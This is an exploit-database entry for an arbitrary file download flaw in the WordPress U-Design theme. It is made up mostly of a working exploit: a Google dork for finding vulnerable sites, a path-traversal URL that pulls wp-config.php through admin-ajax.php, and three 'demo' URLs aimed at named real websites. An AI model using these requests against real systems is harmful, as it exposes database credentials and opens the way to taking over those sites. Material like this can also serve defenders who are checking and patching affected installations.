id: 23143
date: 01/18/2015
title: Wordpress Theme U-Design Arbitrary File Download Vulnerability
author: terrorist
cves: 

######################
# Exploit Title: Wordpress Theme U-Design Arbitrary File Download Vulnerability
# Date: 18/01/2015
# Exploit Author: t3rr0rist - GHC (Georgian Hacking Community) team
# Contact : mrinjector17@gmail.com
# Tested on: Linux
# Google Dork: inurl:"wp-content/themes/u-design/"
######################
  
# Proof of Concept

http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 

#Demo

http://inuitartfoundation.org/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://neadkolor.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.kingstonphoenixgroup.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2023-03-22]  #